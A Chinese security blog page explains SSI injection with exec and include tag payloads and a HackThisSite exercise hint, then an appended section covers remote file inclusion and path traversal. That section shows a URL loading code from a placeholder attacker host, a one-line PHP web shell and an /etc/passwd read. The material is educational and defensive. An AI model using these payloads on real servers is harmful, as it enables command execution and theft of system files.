关于SSI注入(server side includes injection 服务器端包含注入)

0x01 什么是SSI和SSI注入

     SSI是英文Server Side Includes的缩写,翻译成中文就是服务器端包含的意思。从技术角度上说,SSI就是在HTML文件中,可以通过注释行调用的命令或指针。SSI具有强大的功能,只要使用一条简单的SSI 命令就可以实现整个网站的内容更新,时间和日期的动态显示,以及执行shell和CGI脚本程序等复杂的功能。SSI 可以称得上是那些资金短缺、时间紧张、工作量大的网站开发人员的最佳帮手。本文将主要结合Apache服务器介绍SSI的使用方法。

     ps:(Server-side Includes) 服务器端包含提供了一种对现有HTML文档增加动态内容的方法。apache和iis都可以通过配置支持SSI,在网页内容被返回给用户之前,服务器会执行网页内容中的SSI标签。在很多场景中,用户输入的内容可以显示在页面中,比如一个存在反射XSS漏洞的页面,如果输入的payload不是xss代码而是ssi的标签,服务器又开启了ssi支持的话就会存在SSI漏洞

 

0x02 SSI注入的条件

    当符合下列条件时,攻击者可以在 Web 服务器上运行任意命令:
    A. Web 服务器已支持 SSI(服务器端包含)。
    B. Web 应用程序在返回 HTML 页面时,嵌入用户输入。
    C. 参数值未进行输入清理。
    例如,如果脚本接收文本输入,供 Web 服务器稍后处理,下列由 SSI 命令组成的输入便会侵害服务器的安全:
    <!--#include file=""...""-->(会显示给定的文件)
    <!--#exec cmd=""...""-->(会执行给定的 shell 命令)

 

0x03 SSI注入常用命令

    https://www.owasp.org/index.php/Server-Side_Includes_(SSI)_Injection

 

0x04 SSI漏洞的防护

    默认apache不开启ssi,ssi这种技术已经比较少用了。如果应用没有使用到ssi,关闭服务器对ssi的支持即可。

 

0x05 SSI注入在线测试

    hackthissite basic mission 8

    https://www.hackthissite.org/missions/basic/8/

    提示:<--!exec cmd="ls ../"-->

转载于:https://www.cnblogs.com/jokermoon/p/6708691.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
远程文件包含(Remote File Inclusion,RFI)和服务器端文件包含Server Side Include,SSI)是常见的Web应用程序漏洞,攻击者通过利用这些漏洞可以获取网站服务器上的敏感信息,甚至控制整个服务器。下面我来介绍一下这两种漏洞。 一、远程文件包含 远程文件包含是指攻击者通过Web应用程序加载远程托管的文件,这些文件可能包含恶意代码,攻击者可以利用这些代码执行各种攻击,例如窃取敏感信息、控制服务器等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载远程的evil.txt文件,并执行其中的代码。攻击者可以在evil.txt中写入任意的PHP代码,例如: ``` <?php echo shell_exec($_GET['cmd']); ?> ``` 这段代码会执行用户传入的cmd参数,并将结果输出,攻击者可以通过以下URL执行任意的系统命令: ``` http://www.example.com/index.php?page=http://www.attacker.com/evil.txt&cmd=ls%20-la ``` 二、服务器端文件包含 服务器端文件包含是指Web应用程序在处理动态内容时,将用户输入作为文件名或路径名进行处理,攻击者可以利用这个漏洞访问其他文件中的代码,例如配置文件、用户数据等。 攻击者通常会在URL中注入恶意代码,例如: ``` http://www.example.com/index.php?page=../../../etc/passwd ``` 这个URL中的参数page就是攻击者注入的恶意代码,如果应用程序没有对该参数进行过滤,就会直接加载/etc/passwd文件,并将其中的内容输出到页面上,攻击者可以通过这种方式获取敏感信息。 总结 要防止远程文件包含服务器端文件包含漏洞,应该对所有用户输入进行过滤和验证,避免用户输入作为文件名或路径名进行处理。应用程序应该使用白名单机制,仅允许访问特定目录下的文件,而不是允许任意文件的访问。此外,应用程序应该启用PHP的安全模式,禁止执行外部命令、禁止访问网络等操作,以提高安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值